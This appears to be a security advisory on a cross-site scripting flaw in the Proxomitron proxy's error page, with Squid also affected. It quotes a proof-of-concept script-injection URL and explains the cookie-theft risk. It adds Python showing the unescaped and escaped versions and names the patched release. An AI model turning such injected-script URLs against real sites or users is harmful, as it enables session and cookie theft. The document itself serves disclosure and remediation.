COMMAND

    Proxomitron

SYSTEMS AFFECTED

    Proxomitron Naoko-4 BetaFour or earlier

PROBLEM

    Hiromitsu Takagi found the following. Accessing the following URL
    with the browser configured to use Proxomitron as a proxy:

        http://www.example.com:9999/<SCRIPT>document.write(document.domain)</SCRIPT>

    causes Proxomitron to produce output like this:

        <html><head><title>The Proxomitron Reveals...</title>
        ...
        The Proxomitron couldn't connect to...<br>
        <font color=#ffff00 size=+1 > www.example.com:9999/<SCRIPT>document.write(document.domain)</SCRIPT>
        </font><br>
        The site may be busy or the web server may be down.
        ...

    and the browser renders it as follows:

        Error connecting to site
        The Proxomitron couldn't connect to...
        www.example.com:9999/www.example.com
        The site may be busy or the web server may be down.

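    The noteworthy point is that the JavaScript code is executed in the
    context of an arbitrarily specified domain: the error page echoes
    the requested URL without HTML-escaping it, and the browser treats
    the page as coming from the requested host.

    Therefore, malicious JavaScript code written by an attacker can be
    executed in the browser, and the cookies issued by an arbitrarily
    specified site can be stolen.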

    The same problem was found in Squid 2.4 DEVEL4.
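
    The defect visible in the output above, the requested URL copied
    into the error page without HTML escaping, is shown here beside an
    escaped version. This is an added example, not Proxomitron or Squid
    code; the template, function names and response headers are
    assumptions.

```python
# Added illustration; not Proxomitron or Squid source code.
# The template and function names are assumptions modelled on the output above.
import html

ERROR_TEMPLATE = (
    "<html><head><title>Proxy error</title></head><body>\n"
    "The proxy couldn't connect to...<br>\n"
    "<font color=#ffff00 size=+1>{target}</font><br>\n"
    "The site may be busy or the web server may be down.\n"
    "</body></html>\n"
)

def strip_scheme(url):
    """Return host:port/path the way the error page displays it."""
    return url.split("://", 1)[1] if "://" in url else url

def error_page_unescaped(url):
    """Defective behaviour: the requested URL is copied into the page as-is."""
    return ERROR_TEMPLATE.format(target=strip_scheme(url))

def error_page_escaped(url):
    """Corrected behaviour: <, >, & and quotes become character references."""
    return ERROR_TEMPLATE.format(target=html.escape(strip_scheme(url), quote=True))

def error_response(url):
    """Full HTTP response for a failed connection, with the URL escaped.

    The 502 status, explicit charset and script-blocking CSP are defence
    in depth in case an encoding step is missed elsewhere.
    """
    body = error_page_escaped(url).encode("utf-8")
    headers = (
        "HTTP/1.0 502 Bad Gateway\r\n"
        "Content-Type: text/html; charset=utf-8\r\n"
        "Content-Security-Policy: default-src 'none'\r\n"
        f"Content-Length: {len(body)}\r\n"
        "\r\n"
    )
    return headers.encode("ascii") + body

# Constructed sample input: the URL quoted in the advisory.
SAMPLE_URL = "http://www.example.com:9999/<SCRIPT>document.write(document.domain)</SCRIPT>"

if __name__ == "__main__":
    print(error_page_unescaped(SAMPLE_URL))
    print(error_response(SAMPLE_URL).decode("utf-8"))
```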

SOLUTION

    Apply Proxomitron Naoko-4 BetaFive:

        http://spywaresucks.org/prox/beta.html